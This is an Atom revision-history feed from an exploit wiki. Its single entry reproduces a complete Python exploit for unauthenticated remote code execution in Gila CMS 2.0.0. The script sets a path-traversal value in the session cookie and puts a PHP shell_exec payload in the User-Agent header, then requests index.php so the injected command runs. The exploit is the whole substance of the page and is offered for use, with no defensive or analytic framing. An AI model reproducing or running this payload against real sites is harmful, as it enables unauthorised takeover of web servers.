<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Gila_CMS_2.0.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>Gila CMS 2.0.0 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Gila_CMS_2.0.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Gila_CMS_2.0.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-21T01:44:31Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Gila_CMS_2.0.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1276&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated) # Date: 1.12.2021 # Exploit Author: Enesdex # Vendor Homepage: https://gilacms.com/ # S...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Gila_CMS_2.0.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1276&amp;oldid=prev"/>
		<updated>2021-04-08T09:51:10Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated) # Date: 1.12.2021 # Exploit Author: Enesdex # Vendor Homepage: https://gilacms.com/ # S...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)&lt;br /&gt;
# Date: 1.12.2021&lt;br /&gt;
# Exploit Author: Enesdex&lt;br /&gt;
# Vendor Homepage: https://gilacms.com/&lt;br /&gt;
# Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0&lt;br /&gt;
# Version: x &amp;lt; 2.0.0 &lt;br /&gt;
# Tested on: Windows 10&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import time&lt;br /&gt;
&lt;br /&gt;
target_url = &amp;quot;http://192.168.1.101:80/Gila/&amp;quot;&lt;br /&gt;
cmd = &amp;quot;calc.exe&amp;quot;&lt;br /&gt;
&lt;br /&gt;
url = target_url+&amp;quot;?c=admin&amp;quot;&lt;br /&gt;
cookies = {&amp;quot;GSESSIONID&amp;quot;: &amp;quot;../../index.php&amp;quot;}&lt;br /&gt;
headers = {&amp;quot;User-Agent&amp;quot;: &amp;quot;&amp;lt;?php shell_exec('&amp;quot;+cmd+&amp;quot;'); include 'src\\core\\bootstrap.php';  ?&amp;gt;&amp;quot;}&lt;br /&gt;
requests.get(url, headers=headers, cookies=cookies)&lt;br /&gt;
time.sleep(5)&lt;br /&gt;
requests.get(target_url+&amp;quot;/index.php&amp;quot;)&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>